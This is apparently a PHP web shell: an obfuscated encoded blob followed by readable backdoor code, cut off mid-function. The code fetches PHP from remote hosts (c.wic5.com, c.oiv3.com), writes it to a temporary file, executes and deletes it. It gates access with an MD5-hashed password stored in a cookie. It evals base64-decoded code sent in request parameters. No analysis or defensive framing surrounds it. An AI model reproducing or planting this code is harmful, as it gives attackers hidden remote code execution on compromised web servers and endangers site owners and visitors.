"=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");

$L7CRgr = "c3eb21c146b96c0f4138d984a1172762";
preg_replace($L6CRgr[0], serialize(eval {
  function GC($a)
  {
    $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']);
    $code = @file_get_contents($url);
    if ($code == false) {
      $ch = curl_init();
      curl_setopt($ch, CURLOPT_URL, $url);
      curl_setopt($ch, CURLOPT_USERAGENT, 'll');
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_TIMEOUT, 100);
      curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
      $code = curl_exec($ch);
      curl_close($ch);
    }
    return $code;
  }
  if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) {
    $code = GC('https://c.wic5.com/');
    if (!$code) {
      $code = GC('https://c.oiv3.com/');
    }
    $need = '<?php';
    if (strpos($code, $need) === false) {
      die('get failed');
    }
    $file_name = tmpfile();
    fwrite($file_name, $code);
    $a = stream_get_meta_data($file_name);
    $file_path = $a['uri'];
    $content = @file_get_contents($file_path);
    if (!$content) {
      $file_path = '.c';
      file_put_contents($file_path, $code);
    }
    @(require $file_path);
    fclose($file_name);
    @unlink($file_path);
    die;
  }
  if (isset($_REQUEST['d_time'])) {
    die('{->' . $L7CRgr . '<-}');
  }
  $pass = false;
  if (isset($_COOKIE['pass'])) {
    if (md5($_COOKIE['pass']) == $L7CRgr) {
      $pass = true;
    }
  } else {
    if (isset($_POST['pass'])) {
      if (md5($_POST['pass']) == $L7CRgr) {
        setcookie("pass", $_POST['pass']);
        $pass = true;
      }
    }
  }
  if (isset($_POST['logout']) && ($_POST['logout'] = 1)) {
    setcookie("pass", null);
    $pass = false;
  }
  if (isset($_REQUEST['pwd163']) && md5($_REQUEST['pwd163']) == $L7CRgr) {
    $a = base64_decode(rawurldecode(urlencode(urldecode($_REQUEST['zzz']))));
    $need = "<?php";
    if (strpos($a, $need) === false) {
      $a = "<?phpPHP_EOL" . $a;
    }
    if (isset($_REQUEST['e'])) {
      $a = str_replace($need, "", $a);
      $b = "eval";
      eval($a);
      die;
    }
